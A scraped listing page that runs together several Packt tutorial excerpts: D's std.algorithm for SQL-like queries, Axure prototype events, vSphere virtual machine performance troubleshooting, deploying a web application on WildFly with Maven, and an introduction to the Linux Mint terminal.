} User[] users; users ~= User(1, "Alice", "President"); users ~= User(2, "Bob", "Manager"); users ~= User(3, "Claire", "Programmer"); How to do it… Let's use functional tools to query data by executing the following steps: Import std.algorithm. Use sort to translate the ORDER BY clause. If your dataset is large, you may wish to sort it at the end. This will likely require a call to an array, but it will only sort the result set instead of everything. With a small dataset, sorting early saves an array allocation. Use filter to implement the WHERE clause. Use map to implement the field selection and functions. The std.typecons.tuple module can also be used to return specific fields. Use std.range.take to implement the LIMIT clause. Put it all together and print the result. The code is as follows: import std.algorithm; import std.range; import std.typecons : tuple; // we use this below auto resultSet = users. sort!((a, b) => a.id > b.id). // the ORDER BY clause filter!((item) => item.name.startsWith("A")). // the WHERE clause take(5). map!((item) => tuple(item.id, item.name,"Title: " ~ item.title)); // the field list and transformations import std.stdio; foreach(line; resultSet) writeln(line[0], " ", line[1], " ", line[2]); It will print the following output: 1 Alice Title: President How it works… Many SQL operations or list comprehensions can be expressed in D using some building blocks from std.algorithm. They all work generally the same way; they take a predicate as a compile-time argument. The predicate is passed one or two items at a time and you perform a check or transformation on it. Chaining together functions with the dot syntax, like we did here, is possible thanks to uniform function call syntax. It could also be rewritten as take(5, filter!pred(map!pred(users))). It depends on author's preference, as both styles work exactly the same way. It is important to remember that all std.algorithm higher-order ranges are evaluated lazily. This means no computations, such as looping over or printing, are actually performed until they are required. Writing code using filter, take, map, and many other functions is akin to preparing a query. To execute it, you may print or loop the result, or if you want to save it to an array for use later, simply call .array at the end. There's more… The std.algorithm module also includes other classic functions, such as reduce. It works the same way as the others. D has a feature called pure functions. The functions in std.algorithm are conditionally pure, which means they can be used in pure functions if and only if the predicates you pass are also pure. With lambda functions, like we've been using here, the compiler will often automatically deduce this for you. If you use other functions you define as predicates and want to use it in a pure function, be sure to mark them pure as well. See also Visit http://dconf.org/2013/talks/wilson.html where Adam Wilson's DConf 2013 talk on porting C# to D showed how to translate some real-world LINQ code to D Summary In this article, we learned how to sort ranges in an efficient manner by using sorting algorithms. We learned how to search a range using different functions. We also learned how to use functional tools to query data (similar to a SQL query). Resources for Article: Further resources on this subject: Watching Multiple Threads in C# [article] Application Development in Visual C++ - The Tetris Application [article] Building UI with XAML for Windows 8 Using C [article]
Read more
  • 0
  • 0
  • 2735

article-image-article-creating-basic-interactions
Packt
22 May 2014
11 min read
Save for later

Creating Basic Interactions

Packt
22 May 2014
11 min read
(For more resources related to this topic, see here.) "Learning is not attained by chance, it must be sought for with ardor and diligence." - Abigail Adams We joke that Elizabeth is a true designer in the sense that her right brain will be on fire when she approaches her work, so shifting to logic is tricky for her. Despite this, she has been able to build rather sophisticated prototypes. So, while Axure 7 supports the creation of highly advanced rapid prototypes, the key to success for someone who does not have pseudo code running easily through their mind is: approaching interactivity with an open mind, writing down in plain language what the desired interaction should be, and the willingness to seek help from a colleague or online tutorials. The basic model of creating interactivity in an Axure prototype involves four hierarchical building blocks: Interactions, Events, Cases, and Actions. Interactions are triggered by events, which cause cases to execute actions. These four topics are the focus of this Article. Axure Interactions Client expectations of a good user experience continue to rise, and it is clear that we are in the midst of an enormous transition in software design. This, along with the spread of Responsive Web Design (RWD), has placed UX front and center of the web design process. Early in that process is the need to "sell" your vision of the user experience to stakeholders and you have a better chance of success if they have to be engaged as early as possible, starting at the wireframe level. There is less tolerance and satisfaction with static annotated wireframes, which requires an effort on the part of stakeholders to imagine the fluidity of the expected functionality. Axure enables designers to rapidly simulate highly engaging user experiences that can be reviewed and tested on target devices as static wireframes are transformed into dynamic prototypes. In this article, we focus on how to make the transition from static to interactive, using simple, yet wickedly effective interactions. Interactions are Axure's term for the building blocks that turn static wireframes into clickable, interactive HTML prototypes. Axure shields us from the complexities of coding by providing a simple, wizard-like interface for defining instructions and logic in English. Each time we generate the HTML prototype, Axure converts the interactions into real code (JavaScript, HTML, and CSS), which a web browser can understand. Note however, that this code is not production grade code. Each Axure interaction is composed, in essence, of three basic units of information—when, where, and what: When does an interaction happen?: The Axure terminology for "when" is events, and some examples for discrete events include: When the page is loaded in the browser. When a user clicks on a widget, such as a button. When the user tabs out of a form field. A list of events can be seen on the Interactions tab in the Widget Interactions and Notes pane on the right-hand side of the screen. You will also find the related list of events under the Page Interactions tab, which is located under your main workspace. Where can we find the interaction?: An interaction is attached either to a widget, such as a rectangle, radio button, or drop-down list; a page; or a master wireframe. You create widget interactions using the options in the Widget Properties pane, and page and master interactions using the options in the Page Properties pane. These are called cases. A single event can have one or more cases. What should happen?: The Axure terminology for "what", is actions. Actions define the outcome of the interaction. For example, when a page loads, you can instruct Axure on how the page should behave and what it will display when it is first rendered on the screen. More examples of this could be when the user clicks on a button, it will link to another page; when the user tabs out of a form field, the input will be validated and an error message. Ensure that all of the actions you want to include for that case or scenario are in the same case. Multiple Cases Sometimes, an event could have alternative paths, each with its own case(s). The determination of which path to trigger is controlled with conditional logic which we will cover later in this article. Axure Events In general, Axure interactions are triggered by two types of events, which are as follows: Page and master level events which can be triggered automatically, such as when the page is loaded in the browser, or as a result of a user action, such as scrolling. When a user directly interacts with a widget on the page. These interactions are typically triggered directly by the user, such as clicking on a button, or as a result of a user action which causes a number of events to follow. Page level Events Think this concept as a staging setup, an orchestration of actions that takes place behind the scenes and is executed as the page gets rendered in the browser. Moreover, it is a setup to which you can apply conditional logic and variables, and deliver a contextual rendering of the page. In short, events, which can be applied to pages and on masters, will likely become one of your frequently used methods to control your prototype. Keep in mind that the order in which the interactions you build into the prototype will be executed by the browser. The following Image 1 screenshot illustrates the OnPageLoad event as an example: The browser gets a request to load a page (Image 1, A), either because it is the first time you launch the prototype or as a result of navigation from one prototype page to another. The browser first checks for OnPageLoad interactions. An OnPageLoad event (B) may be associated with the loading page (C), a master used on the page (D), or both. If OnPageLoad exists, the browser first evaluates page-level interactions, and then master-level interactions. The benefits of this order of operations is that you can set the value of a variable on the page's OnPageLoad interaction and pass that variable to the master's OnPageLoad interaction. It sounds a bit complicated, perhaps. If the OnPageLoad interaction includes condition(s) (E), the browser will evaluate the logic and execute the appropriate action (F and/or G). Otherwise, if the OnPageLoad event does not include a condition, the browser will execute the interaction (H). The requested page is rendered (I) per the interaction. Image 1 The following table lists the events offered at a page level: Event names Definition OnPageLoad This event will trigger assigned action(s) that will impact how the page is initially rendered after it loads. OnWindowResize This event will trigger assigned action(s) when a browser is resized. OnWindowScroll This event will trigger assigned action(s) when the user scrolls the browser window. OnPageClick This event will trigger assigned action(s) when the user clicks on any empty part of the page (not clicking on any widget). OnPageDoubleClick This event will trigger assigned action(s) when the user double-clicks on any empty part of the page (not clicking on any widget). OnContextMenu This event will trigger assigned action(s) when the user right-clicks any empty a part of the page (not clicking on any widget). OnMouseMove This event will trigger assigned action(s) when the mouse pointer is moved anywhere on the page. OnPageKeyUp This event will trigger assigned action(s) when a pressed key is released. OnPageKeyDown This event will trigger assigned action(s) when a key is pressed. OnAdaptiveViewChange This event will trigger assigned action(s) on a switch from on adaptive view to another. Widget-level Events The OnClick event, whether using a mouse or tapping a finger, is one of the fundamental triggers of modern user-computer interactions. In Axure, this action is one of the several actions you can associate with a widget. The following Image 2 screenshot illustrates how widget-level events are processed: The user interacts with a widget by initiating an event (Image 2, A), such as OnClick, which is associated with that widget (B). The type of widget (Button, Checkbox, and so on) constrains the possible response the user can expect (D). For example, before clicking on a button, the user may move the mouse over it and the visual appearance of the button will change in response to the OnMouseEnter event. Axure includes events that can also handle mobile devices, the use of fingers, as means of enabling the user's direct manipulation of the interface. The browser will check if conditional logic is tied to the widget event (E). For example, you may have created an interaction in which a rollover event will display different states of a dynamic panel based on some variable. The browser will evaluate the condition and execute the action(s) (F and/or G). If no conditions exist, the browser will execute the action(s) associated with the widget (H). Based on the actions tied to the event, the browser will update the screen or load some other screen (I). Image 2 The following table lists Axure's inventory of events which can be applied to widgets and dynamic panels. Each widget has its own set of possible actions: Event names Dynamic panels Definition OnClick   The user clicks on an element. OnPanelStateChange X Dynamic panels may have multiple states and this event can be used to trigger action(s) when a dynamic panel changes states. OnDragStart X This event pinpoints the moment the user begins to drag a dynamic panel. OnDrag X This event spans the duration of the dynamic panel being dragged. OnDragDrop X This event pinpoints the moment the user finished dragging the dynamic panel. This could be an opportunity to validate that, for example, the user placed the widget in the right place. OnSwipeLeft X The event will trigger assigned action(s) when the user swipes from right to left. OnSwipeRight X The event will trigger assigned action(s) when the user swipes from left to right. OnSwipeUp X The event will trigger assigned action(s) when the user swipes upwards. OnSwipeDown X The event will trigger assigned action(s) when the user swipes downwards. OnDoubleClick   The event will trigger assigned action(s) when the user double-clicks on an element. OnContextMenu   The event will trigger assigned action(s) when the user right-clicks on an element. OnMouseDown   The event will trigger assigned action(s) when the user clicks on the element but has yet to release the mouse button. OnMouseUp   The event will trigger assigned action(s) on the release of the mouse button. OnMouseMove   The event will trigger assigned action(s) when the user moves the cursor. OnMouseEnter   The event will trigger assigned action(s) when the cursor is moved over an element OnMouseOut   The event will trigger assigned action(s) when the cursor is moved away from an element. OnMouseHover   The event will trigger assigned action(s) when the cursor is placed over an element. This is great for custom tooltips. OnLongClick   This is great to use on a touchscreen. Use this when a user clicks on the element and holds it. OnKeyDown   The event will trigger assigned action(s) as the user presses a key on the keyboard. It can be attached to any widget, but the action is only sent to the widget that has focus. OnKeyUp   The event will trigger assigned action(s) as the user releases a pressed key on the keyboard. OnMove   The event will trigger assigned action(s) when the referenced widget moves. OnShow   The event will trigger assigned action(s) when the visibility state of the referenced widget changes to Show. OnHide   The event will trigger assigned action(s) when the visibility state of the referenced widget changes to Show OnScroll X The event will trigger assigned action(s) when the user is scrolling. Good to use in conjunction with the Pin to Browser feature. OnResize X The event will trigger assigned action(s) when it detects that referenced panel has been resized. OnLoad X The dynamic panel is initiated when a page is loaded. OnFocus     The event will trigger assigned action(s) when the widget comes into focus. OnLostFocus   The event will trigger assigned action(s) when the widget loses focus. OnSelectionChange   This event is only applicable to drop-down lists and is typically used with a condition: when selected option of X, show this. Use this when you want a selection option to trigger action(s) that will change something on the wireframe. OnCheckedChange   This event is only applicable to radio buttons and textboxes. Use this when you want a selection option to trigger action(s) that will change something on the wireframe.
Read more
  • 0
  • 0
  • 1919

article-image-virtual-machine-design
Packt
21 May 2014
8 min read
Save for later

Virtual Machine Design

Packt
21 May 2014
8 min read
(For more resources related to this topic, see here.) Causes of virtual machine performance problems In a perfect virtual infrastructure, you will never experience any performance problems and everything will work well within the budget that you allocated. But should there be circumstances that happen in this perfect utopian datacenter you've designed, hopefully this section will help you to identify and resolve the problems easier. CPU performance issues The following is a summary list of some the common CPU performance issues you may experience in your virtual infrastructure. While the following is not an exhaustive list of every possible problem you can experience with CPUs, it can help guide you in the right direction to solve CPU-related performance issues: High ready time: When your ready time is above 10 percent, this could indicate CPU contention and could be impacting the performance of any CPU-intensive applications. This is not a guarantee of a problem; however, applications which are not nearly as sensitive can still report high values and perform well within guidelines. Whether your application is CPU-ready is measured in milliseconds to get percentage conversion; see KB 2002181. High costop time: The costop time will often correlate to contention in multi-vCPU virtual machines. Costop time exceeding 10 percent could cause challenges when vSphere tries to schedule all vCPUs in your multi-vCPU servers. CPU limits: As discussed earlier, you will often experience performance problems if your virtual machine tries to use more resources than have been configured in your limits. Host CPU saturation: When the vSphere host utilization runs at above 80 percent, you may experience host saturation issues. This can introduce performance problems across the host as the CPU scheduler tries to assign resources to virtual machines. Guest CPU saturation: This is experienced on high utilization of vCPU resources within the operating system of your virtual machines. This can be mitigated, if required, by adding additional vCPUs to improve the performance of the application. Misconfigured affinity: Affinity is enabled by default in vSphere; however, if manually configured to be assigned to a specific physical CPU, problems can be encountered. This can often be experienced when creating a VM with affinity settings and then cloning the VM. VMware advises against manually configuring affinity. Oversizing vCPUs: When assigning multiple vCPUs to a virtual machine, you would want to ensure that the operating system is able to take advantage of the CPUs, threads, and your applications can support them. The overhead associated with unused vCPUs can impact other applications and resource scheduling within the vSphere host. Low guest usage: Sometimes poor performance problems with low CPU utilization will help identify the problem existing as I/O or memory. This is often a good guiding indicator that your CPU being underused can be caused by additional resources or even configuration. Memory performance issues Additionally, the following list is a summary of some common memory performance issues you may experience in your virtual infrastructure. The way VMware vSphere handles memory management, there is a unique set of challenges with troubleshooting and resolving performance problems as they arise: Host memory: Host memory is both a finite and very limited resource. While VMware vSphere incorporates some creative mechanisms to leverage and maximize the amount of available memory through features such as page sharing, memory management, and resource-allocation controls, there are several memory features that will only take effect when the host is under stress. Transparent page sharing: This is the method by which redundant copies of pages are eliminated. TPS, enabled by default, will break up regular pages into 4 KB chunks for better performance. When virtual machines have large physical pages (2 MB instead of 4 KB), vSphere will not attempt to enable TPS for these as the likelihood of multiple 2 MB chunks being similar is less than 4 KB. This can cause a system to experience memory overcommit and performance problems may be experienced; if memory stress is then experienced, vSphere may break these 2 MB chunks into 4 KB chunks to allow TPS to consolidate the pages. Host memory consumed: When measuring utilization for capacity planning, the value of host memory consumed can often be deceiving as it does not always reflect the actual memory utilization. Instead, the active memory or memory demand should be used as a better guide of actual memory utilized as features such as TPS can reflect a more accurate picture of memory utilization. Memory over-allocation: Memory over-allocation will usually be fine for most applications in most environments. It is typically safe to have over 20 percent memory allocation especially with similar applications and operating systems. The more similarity you have between your applications and environment, the higher you can take that number. Swap to disk: If you over-allocate your memory too high, you may start to experience memory swapping to disk, which can result in performance problems if not caught early enough. It is best, in those circumstances, to evaluate which guests are swapping to disk to help correct either the application or the infrastructure as appropriate. For additional details on vSphere Memory management and monitoring, see KB 2017642. Storage performance issues When it comes to storage performance issues within your virtual machine infrastructure, there are a few areas you will want to pay particular attention to. Although most storage-related problems you are likely to experience will be more reliant upon your backend infrastructure, the following are a few that you can look at when identifying if it is the VM's storage or the SAN itself: Storage latency: Latency experienced at the storage level is usually expressed as a combination of the latency of the storage stack, guest operating system, VMkernel virtualization layer, and the physical hardware. Typically, if you experience slowness and are noticing high latencies, one or more aspects of your storage could be the cause. Three layers of latency: ESXi and vCenter typically report on three primary latencies. These are Guest Average Latency (GAVG), Device Average Latency (DAVG), and Kernel Average Latency (KAVG). Guest Average Latency (GAVG): This value is the total amount of latency that ESXi is able to detect. This is not to say that it is the total amount of latency being experienced but is just the figure of what ESXi is reporting against. So if you're experiencing a 5 ms latency with GAVG and a performance application such as Perfmon is identifying a storage latency of 50 ms, something within the guest operating system is incurring a penalty of 45 ms latency. In circumstances such as these, you should investigate the VM and its operating system to troubleshoot. Device Average Latency (DAVG): Device Average Latency tends to focus on the more physical of things aligned with the device; for instance, if the storage adapters, HBA, or interface is having any latency or communication backend to the storage array. Problems experienced here tend to fall more on the storage itself and less so as a problem which can be easily troubleshooted within ESXi itself. Some exceptions to this being firmware or adapter drivers, which may be introducing problems or queue depth in your HBA. More details on queue depth can be found at KB 1267. Kernel Average Latency (KAVG): Kernel Average Latency is actually not a specific number as it is a calculation of "Total Latency - DAVG = KAVG"; thus, when using this metric you should be wary of a few values. The typical value of KAVG should be zero, anything greater may be I/O moving through the kernel queue and can be generally dismissed. When your latencies are 2 ms or consistently greater, this may indicate a storage performance issue with your VMs, adapters, and queues should be reviewed for bottlenecks or problems. The following are some KB articles that can help you further troubleshoot virtual machine storage: Using esxtop to identify storage performance issues (KB1008205) Troubleshooting ESX/ESXi virtual machine performance issues (KB2001003) Testing virtual machine storage I/O performance for VMware ESX and ESXi (KB1006821) Network performance issues Lastly, when it comes to addressing network performance issues, there are a few areas you will want to consider. Similar to the storage performance issues, a lot of these are often addressed by the backend networking infrastructure. However, there are a few items you'll want to investigate within the virtual machines to ensure network reliability. Networking error, IP already assigned to another adapter: This is a common problem experienced post V2V or P2V migrations, which results in ghosted network adapters. VMware KB 1179 guides you through the steps to go about removing these ghosted network adapters. Speed or duplex mismatch within the OS: Left at defaults, the virtual machine will use auto-negotiation to get maximum network performance; if configured down from that speed, this can introduce virtual machine limitations. Choose the correct network adapter for your VM: Newer operating systems should support the VMXNET3 adapter while some virtual machines, either legacy or upgraded from previous versions, may run older network adapter types. See KB 1001805 to help decide which adapters are correct for your usage. The following are some KB articles that can help you further troubleshoot virtual machine networking: Troubleshooting virtual machine network connection issues (KB 1003893) Troubleshooting network performance issues in a vSphere environment (KB 1004097) Summary With this article, you should be able to inspect existing VMs while following design principles that will lead to correctly sized and deployed virtual machines. You also should have a better understanding of when your configuration is meeting your needs, and how to go about identifying performance problems associated with your VMs. Resources for Article: Further resources on this subject: Introduction to vSphere Distributed switches [Article] Network Virtualization and vSphere [Article] Networking Performance Design [Article]
Read more
  • 0
  • 0
  • 9681
Packt
21 May 2014
8 min read
Save for later

Running our first web application

Packt
21 May 2014
8 min read
(For more resources related to this topic, see here.) The standalone/deployments directory, as in the previous releases of JBoss Application Server, is the location used by end users to perform their deployments and applications are automatically deployed into the server at runtime. The artifacts that can be used to deploy are as follows: WAR (Web application Archive): This is a JAR file used to distribute a collection of JSP (Java Server Pages), servlets, Java classes, XML files, libraries, static web pages, and several other features that make up a web application. EAR (Enterprise Archive): This type of file is used by Java EE for packaging one or more modules within a single file. JAR (Java Archive): This is used to package multiple Java classes. RAR (Resource Adapter Archive): This is an archive file that is defined in the JCA specification as the valid format for deployment of resource adapters on application servers. You can deploy a RAR file on the AS Java as a standalone component or as part of a larger application. In both cases, the adapter is available to all applications using a lookup procedure. The deployment in WildFly has some deployment file markers that can be identified quickly, both by us and by WildFly, to understand what is the status of the artifact, whether it was deployed or not. The file markers always have the same name as the artifact that will deploy. A basic example is the marker used to indicate that my-first-app.war, a deployed application, will be the dodeploy suffix. Then in the directory to deploy, there will be a file created with the name my-first-app.war.dodeploy. Among these markers, there are others, explained as follows: dodeploy: This suffix is inserted by the user, which indicates that the deployment scanner will deploy the artifact indicated. This marker is mostly important for exploded deployments. skipdeploy: This marker disables the autodeploy mode while this file is present in the deploy directory, only for the artifact indicated. isdeploying: This marker is placed by the deployment scanner service to indicate that it has noticed a .dodeploy file or a new or updated autodeploy mode and is in the process of deploying the content. This file will be erased by the deployment scanner so the deployment process finishes. deployed: This marker is created by the deployment scanner to indicate that the content was deployed in the runtime. failed: This marker is created by the deployment scanner to indicate that the deployment process failed. isundeploying: This marker is created by the deployment scanner and indicates the file suffix .deployed was deleted and its contents will be undeployed. This marker will be deleted when the process is completely undeployed. undeployed: This marker is created by the deployment scanner to indicate that the content was undeployed from the runtime. pending: This marker is placed by the deployment scanner service to indicate that it has noticed the need to deploy content but has not yet instructed the server to deploy it. When we deploy our first application, we'll see some of these marker files, making it easier to understand their functions. To support learning, the small applications that I made will be available on GitHub (https://github.com) and packaged using Maven (for further details about Maven, you can visit http://maven.apache.org/). To begin the deployment process, we perform a checkout of the first application. First of all you need to install the Git client for Linux. To do this, use the following command: [root@wfly_book ~]# yum install git –y Git is also necessary to perform the Maven installation so that it is possible to perform the packaging process of our first application. Maven can be downloaded from http://maven.apache.org/download.cgi. Once the download is complete, create a directory that will be used to perform the installation of Maven and unzip it into this directory. In my case, I chose the folder /opt as follows: [root@wfly_book ~]# mkdir /opt/maven Unzip the file into the newly created directory as follows: [root@wfly_book maven]# tar -xzvf /root/apache-maven-3.2.1-bin.tar.gz [root@wfly_book maven]# cd apache-maven-3.2.1/ Run the mvn command and, if any errors are returned, we must set the environment variable M3_HOME, described as follows: [root@wfly_book ~]# mvn -bash: mvn: command not found If the error indicated previously occurs again, it is because the Maven binary was not found by the operating system; in this scenario, we must create and configure the environment variable that is responsible for this. First, two settings, populate the environment variable with the Maven installation directory and enter the directory in the PATH environment variable in the necessary binaries. Access and edit the /etc/profile file, taking advantage of the configuration that we did earlier with the Java environment variable, and see how it will look with the Maven configuration file as well: #Java and Maven configuration export JAVA_HOME="/usr/java/jdk1.7.0_45" export M3_HOME="/opt/maven/apache-maven-3.2.1" export PATH="$PATH:$JAVA_HOME/bin:$M3_HOME/bin" Save and close the file and then run the following command to apply the following settings: [root@wfly_book ~]# source /etc/profile To verify the configuration performed, run the following command: [root@wfly_book ~]# mvn -version Well, now that we have the necessary tools to check out the application, let's begin. First, set a directory where the application's source codes will be saved as shown in the following command: [root@wfly_book opt]# mkdir book_apps [root@wfly_book opt]# cd book_apps/ Let's check out the project using the command, git clone; the repository is available at https://github.com/spolti/wfly_book.git. Perform the checkout using the following command: [root@wfly_book book_apps]# git clone https://github.com/spolti/wfly_book.git Access the newly created directory using the following command: [root@wfly_book book_apps]# cd wfly_book/ For the first example, we will use the application called app1-v01, so access this directory and build and deploy the project by issuing the following commands. Make sure that the WildFly server is already running. The first build is always very time-consuming, because Maven will download all the necessary libs to compile the project, project dependencies, and Maven libraries. [root@wfly_book wfly_book]# cd app1-v01/ [root@wfly_book app1-v01]# mvn wildfly:deploy For more details about the WildFly Maven plugin, please take a look at https://docs.jboss.org/wildfly/plugins/maven/latest/index.html. The artifact will be generated and automatically deployed on WildFly Server. Note that a message similar to the following is displayed stating that the application was successfully deployed: INFO [org.jboss.as.server] (ServerService Thread Pool -- 29) JBAS018559: Deployed "app1-v01.war" (runtime-name : "app1-v01.war") When we perform the deployment of some artifact, and if we have not configured the virtual host or context root address, then in order to access the application we always need to use the application name without the suffix, because our application's address will be used for accessing it. The structure to access the application is http://<your-ip-address>:<port-number>/app1-v01/. In my case, it would be http://192.168.11.109:8080/app1-v01/. See the following screenshot of the application running. This application is very simple and is made using JSP and rescuing some system properties. Note that in the deployments directory we have a marker file that indicates that the application was successfully deployed, as follows: [root@wfly_book deployments]# ls -l total 20 -rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war -rw-r--r--. 1 wildfly wildfly 12 Jan 21 07:33 app1-v01.war.deployed -rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt To undeploy the application without having to remove the artifact, we need only remove the app1-v01.war.deployed file. This is done using the following command: [root@wfly_book ~]# cd $JBOSS_HOME/standalone/deployments [root@wfly_book deployments]# rm app1-v01.war.deployed rm: remove regular file `app1-v01.war.deployed'? y In the previous option, you will also need to press Y to remove the file. You can also use the WildFly Maven plugin for undeployment, using the following command: [root@wfly_book deployments]# mvn wildfly:undeploy Notice that the log is reporting that the application was undeployed and also note that a new marker, .undeployed, has been added indicating that the artifact is no longer active in the runtime server as follows: INFO [org.jboss.as.server] (DeploymentScanner-threads - 1) JBAS018558: Undeployed "app1-v01.war" (runtime-name: "app1-v01.war") And run the following command: [root@wfly_book deployments]# ls -l total 20 -rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war -rw-r--r--. 1 wildfly wildfly 12 Jan 21 09:44 app1-v01.war.undeployed -rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt [root@wfly_book deployments]# If you make undeploy using the WildFly Maven plugin, the artifact will be deleted from the deployments directory. Summary In this article, we learn how to configure an application using a virtual host, the context root, and also how to use the logging tools that we now have available to use Java in some of our test applications, among several other very interesting settings. Resources for Article: Further resources on this subject: JBoss AS Perspective [Article] JBoss EAP6 Overview [Article] JBoss RichFaces 3.3 Supplemental Installation [Article]
Read more
  • 0
  • 0
  • 1605

article-image-introduction-terminal
Packt
21 May 2014
19 min read
Save for later

An Introduction to the Terminal

Packt
21 May 2014
19 min read
(For more resources related to this topic, see here.) Why should we use the terminal? With Mint containing a complete suite of graphical tools, one may wonder why it is useful to learn and use the terminal at all. Depending on the type of user, learning how to execute commands in a terminal may or may not be beneficial. If you are a user who intends to use Linux only for basic purposes such as browsing the Internet, checking e-mails, playing games, editing documents, printing, watching videos, listening to music, and so on, terminal commands may not be a useful skill to learn as all of these activities (as well as others) are best handled by a graphical desktop environment. However, the real value of the terminal in Linux comes with advanced administration. Some administrative activities are faster using shell commands than using the GUI. For example, if you wanted to edit the /etc/fstab file, it would take fewer steps to type sudo nano /etc/fstab than it would to open a file manager with root permissions, navigate to the /etc directory, find the fstab file, and click on it to open it. This is especially true if all you want to do is make a quick change. Similarly, typing sudo apt-get install geany may be faster if you already know the name of the package you want, compared to opening up Mint Software Manager, waiting for it to load, finding the geany package, and installing it. On older and slower systems, the overhead caused by graphical programs may delay execution time. Another value in the Linux Shell is scripting. With a script, you can create a text file with a list of commands and instructions and execute all of the commands contained within a single execution. For example, you can create a list of packages that you would prefer to install on your system, type them out in a text file, and add your distribution package's installation command at the beginning of the list. Now, you can install all of your favorite programs with a single command. If you save this script for later, you can execute it any time you reinstall Linux Mint so that you can immediately have access to all your favorite programs. If you are administering a server, you can create a script to check the overall health of the system at various times, check for security intrusions, or even configure servers to send you weekly reports on just about anything you'd like to keep yourself updated on. There are entire books dedicated to scripting, so we won't go in detail about it in this article. However, by the end of the article, we will create a script to demonstrate how to do so. Accessing the shell When it comes to Linux, there is very rarely (if ever) a single way to do anything. Just like you have your pick between desktop environments, text editors, browsers, and just about anything else, you also have a choice when it comes to accessing a Linux terminal to execute shell commands. As a matter of fact, you even have a choice on which terminal emulator to use in order to interpret your commands. Linux Mint comes bundled with an application called the GNOME Terminal. This application is actually developed for a completely different desktop environment (GNOME) but is included in Mint because the Mint developers did not create their own terminal emulator for Cinnamon. The GNOME Terminal did the job very well, so there was no need to reinvent the wheel. Once you open the GNOME Terminal, it is ready to do your bidding right away. The following screenshot shows the GNOME terminal, ready for action: As mentioned earlier, there are other terminal emulators that are available. One of the popular terminal emulators is Konsole. It typically comes bundled with Linux distributions, which feature the KDE environment (such as Mint's own KDE edition). In addition, there is also the xfce4-terminal, which comes bundled with the Xfce environment. Although each terminal emulator is generally geared toward the desktop environment that features it, there's nothing stopping you from installing them if you find that GNOME Terminal doesn't suit your needs. However, each of the terminal emulators generally function in much the same way, and you may not notice much of a difference, especially when you're starting out. You may be wondering what exactly a terminal emulator is. A terminal emulator is a windowed application that runs in a graphical environment (such as Cinnamon in Mint) that provides you with a terminal window through which you can execute shell commands to interact with the system. In essence, a terminal emulator is emulating what a full-screen terminal may look like, but in an application window. Each terminal emulator in Linux gives you the ability to interact with that distribution's chosen shell, and as each of the various terminal emulators interact with the same shell, you won't notice anything unique about them regarding how commands are run. The differences between one terminal emulator and another are usually in the form of features in the graphical user interface, which surround the terminal window, such as being able to open new terminal windows in tabs instead of separate instances and even open transparent windows so that you can see what is behind your terminal window as you type. While learning about Linux, you'll often hear the term Bash when referring to the shell. Bash is a type of command interpreter that Linux uses; however, there are several others, including (but not limited to) the C shell, the Dash shell, and the Korn shell. When you interact with your Linux distribution through a terminal emulator, you are actually interacting with its shell. Bash itself is a successor to Bourne shell (originally created by Stephen Bourne) and is an acronym for "Bourne Again Shell." All distributions virtually include Bash as their default shell; it's the closest shell to a standard one in terms of shells that Linux has. As you start out on your Linux journey, Bash is the only shell you should concern yourself with and the only shell that will be covered in this article. Scripts are generally written against the shell environment in which they are intended to run. This is why when you read about writing scripts in Linux, you'll see them referred to as Bash Scripts as Bash is the target shell and pretty much the standard Linux shell. In addition, terminal emulators aren't the only way to access the Linux shell for entering commands. In fact, you don't even need to install a terminal emulator. You can use TTY (Teletype) terminals, which are full-screen terminals available for your use, by simply pressing a combination of keys on your keyboard. When you switch to a TTY terminal, you are switching away from your desktop environment to a dedicated text-mode console. You can access a TTY terminal by pressing Alt + Ctrl and one of the function keys (F1 through F6) at the same time. To switch back to Cinnamon, press Alt + Ctrl + F8. Not all distributions handle TTY terminals in the same way. For example, some start the desktop environment on TTY 7 (Alt + Ctrl + F7), and others may have a different number of TTYs available. If you are using a different flavor of Mint and Alt + Ctrl + F8 doesn't bring you back to your desktop environment, try Alt + Ctrl + F7 instead. You should notice that the terminal number changes each time you switch between TTY terminals. For example, if you press Alt + Ctrl + F1, you should see a heading that looks similar to Linux Mint XX ReleaseName HostName tty1 (notice the tty number at the end). If you press Alt + Ctrl + F2, you'll see a heading similar to Linux Mint XX ReleaseName HostName tty2. You should notice right away that the TTY number corresponds to the function key you used to access it. The benefit of a TTY is that it is an environment separate from your desktop environment, where you can run commands and large jobs. You can have a separate command running in each TTY, each independent of the others, without occupying space in your desktop environment. However, not everyone will find TTYs useful. It all depends on your use case and personal preferences. Regardless of how you access a terminal in Linux to practice entering your commands, all the examples in this article will work fine. In fact, it doesn't even matter if you use the bundled GNOME Terminal or another terminal emulator. Feel free to play around as each of them handles commands in the same way and will work fine for the purposes of this article. Executing commands While utilizing the shell and entering commands, you will find yourself in a completely different world compared to your desktop environment. While using the shell, you'll enter a command, wait for a confirmation that the command was successful (if applicable), and then you will be brought back to the prompt so that you can execute another command. In many cases, the shell simply returns to the prompt with no output. This constitutes a success. Be warned though; the Linux shell makes no assumptions. If you type something incorrectly, you will either see an error message or produce unexpected output. If you tell the shell to delete a file and you direct it to the wrong one, it typically won't prompt for confirmation and will bypass the trash folder. The Linux Shell does exactly what you tell it to, not necessarily what you want it to. Don't let that scare you though. The Linux Shell is very logical and easy to learn. However, with great power comes great responsibility. To get started, open your terminal emulator. You can either open the GNOME Terminal (you will find it in the application menu under Accessories or pinned to the left pane of the application menu by default) or switch to a TTY by pressing Ctrl + Alt +F1. You'll see a prompt that will look similar to the following: username@hostname ~$ Let's take a moment to examine the prompt. The first part of the prompt displays the username that the commands will be executed as. When you first open a terminal, it is opened under the user account that opened it. The second part of the prompt is the host name of the computer, which will be whatever you named it during the installation. Next, the path is displayed. In the preceding example, it's simply a tilde (~). The ~ character in Linux represents the currently logged-in user's home directory. Thus, in the preceding prompt, we can see that the current directory that the prompt is attached to is the user's home directory. Finally, a dollar sign symbol ($) is displayed. This represents that the commands are to be run as a normal user and not as a root user. For example, a user named C. Norris is using a machine named Neptune. This user opens a terminal and then switches to the /media directory. The prompt would then be similar to the following: cnorris@neptune /media $ Now that we have an understanding of the prompt, let's walk through some examples of entering some very basic commands, which are discussed in the following steps. Later in the article, we'll go over more complete examples; however, for now, let's take the terminal out for a spin. Open a prompt, type pwd, and press Enter. The pwd command stands for print working directory. In the output, it should display the complete path that the terminal is attached to. If you ever lose your way, the pwd command will save the 